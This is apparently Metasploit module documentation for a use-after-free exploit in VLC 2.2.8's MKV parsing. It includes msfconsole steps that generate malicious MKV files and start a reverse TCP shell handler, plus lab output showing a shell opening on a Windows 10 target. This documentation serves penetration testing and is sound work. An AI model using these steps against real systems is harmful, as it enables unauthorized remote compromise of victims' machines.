Vlc Mkv - Metasploit Framework

Description

VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.

This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.

Vulnerable Application

VLC <= v2.2.8

Verification Steps

./msfconsole -q
use exploit/windows/fileformat/vlc_mkv
run
Start handler
Copy over mkv files to target hosts and open part1 in VLC
Set a shell

Scenarios

Windows 10 x64 running VLC 2.2.8 (x64)

msf > use exploit/windows/fileformat/vlc_mkv
msf exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 
lhost => 172.22.222.134
msf exploit(windows/fileformat/vlc_mkv) > run

[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
[*] Created tjub-part1.mkv. Target should open this file
[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
[*] Appending blocks to tjub-part1.mkv
[+] Successfully appended blocks to tjub-part1.mkv
msf exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
[*] Payload handler running as background job 0.
msf exploit(windows/fileformat/vlc_mkv) > 
[*] Started reverse TCP handler on 172.22.222.134:4444 
[*] Sending stage (336 bytes) to 172.22.222.200
[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
sessions -i 2
[*] Starting interaction with 2...

systeminfo
systeminfo

Host Name:                 DESKTOP-IPOGIJR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134